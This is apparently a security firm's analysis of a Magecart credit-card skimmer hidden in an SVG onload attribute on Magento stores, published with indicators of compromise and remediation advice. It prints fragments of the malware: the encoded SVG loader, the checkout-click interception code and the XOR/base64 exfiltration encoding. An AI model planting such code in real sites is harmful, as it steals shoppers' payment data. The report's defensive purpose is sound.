SVG Onload Tag Hides Magecart Skimmer on 99 Stores

In the early hours of April 7th, nearly 100 Magento stores got mass-infected with a "double-tap" skimmer: a credit card stealer hidden inside an invisible SVG element. Sansec found stolen payment data flowing to six exfiltration domains, five of which are previously unknown. The likely entry vector is the PolyShell vulnerability that continues to affect unprotected Magento stores.

The skimmer shows victims a convincing "Secure Checkout" overlay, complete with card validation and billing fields. After capturing payment details, it silently redirects the shopper to the real checkout page. Most victims never notice.

How the injection works

The attacker injects a 1x1 pixel SVG element into the store's HTML. The onload handler contains the entire skimmer payload, base64-encoded inside an atob() call and executed via setTimeout:

<svg
  width="1px"
  height="1px"
  onload="(()=>{setTimeout(atob('KGZ1bmN0aW9uKCl7IGlm...'),1)})()"
></svg>

This technique avoids creating external script references that security scanners typically flag. The entire malware lives inline, encoded as a single string attribute.

The fake checkout overlay

When a shopper clicks any checkout button, the skimmer intercepts the click using useCapture and displays a full-screen modal overlay instead. The overlay includes a "Secure Checkout" header with lock icon, card fields with real-time Luhn validation, and a full billing form. If the shopper selects "Other payment method," the skimmer closes and redirects to the real checkout.

The decoded payload shows how the overlay intercepts checkout navigation:

document.addEventListener(
  "click",
  function (e) {
    var el = e.target.closest('a,button,[role="button"]');
    if (!el) return;
    var href = el.getAttribute("href") || "";
    if (
      (href && checkoutUrl.includes(href)) ||
      el.getAttribute("data-role") === "proceed-to-checkout" ||
      el.id === "top-cart-btn-checkout"
    ) {
      e.preventDefault();
      e.stopImmediatePropagation();
      show(); // display fake checkout overlay
    }
  },
  true,
); // useCapture: fires before store's own handlers

Data exfiltration

After the victim submits the form, the skimmer collects all fields and encodes them using XOR with the key "script", followed by base64:

var raw = JSON.stringify(payload),
  encoded = "";
for (var i = 0; i < raw.length; i++)
  encoded += String.fromCharCode(
    raw.charCodeAt(i) ^ "script".charCodeAt(i % 6),
  );

var b64Payload = btoa(encoded);

The exfiltration URL itself is double-encoded via nested atob() calls. All six domains use the same endpoint: /fb_metrics.php, disguised as a Facebook analytics tracker. The skimmer sends data via fetch() POST with no-cors mode, falling back to a hidden iframe. After exfiltration, it sets localStorage.setItem('_mgx_cv', '1') to avoid capturing the same shopper twice, and redirects to the real checkout page.

Indicators of Compromise

Exfiltration domains

All six domains resolve to 23.137.249.67, hosted at IncogNet LLC (AS40663) in the Netherlands.

Technical indicators

Recommendations

1. Block attacks: Deploy Sansec Shield to block exploitation attempts in real-time
2. Scan for compromise: Run eComscan to detect this skimmer and other malware, backdoors, and vulnerabilities
3. Check for the SVG tag: Search your page source for <svg elements with onload attributes containing atob(
4. Clear localStorage: Infected stores should advise affected customers. The _mgx_cv key in browser localStorage indicates a shopper's payment data was captured

Read more

• Mass PolyShell attack wave hits 471 stores in one hour
• Novel WebRTC skimmer bypasses security controls at $100+ billion car maker
• Digital skimmer hits global supermarket chain
• Keylogger targets 200,000+ employees at major US bank
• PolyShell: unrestricted file upload in Magento and Adobe Commerce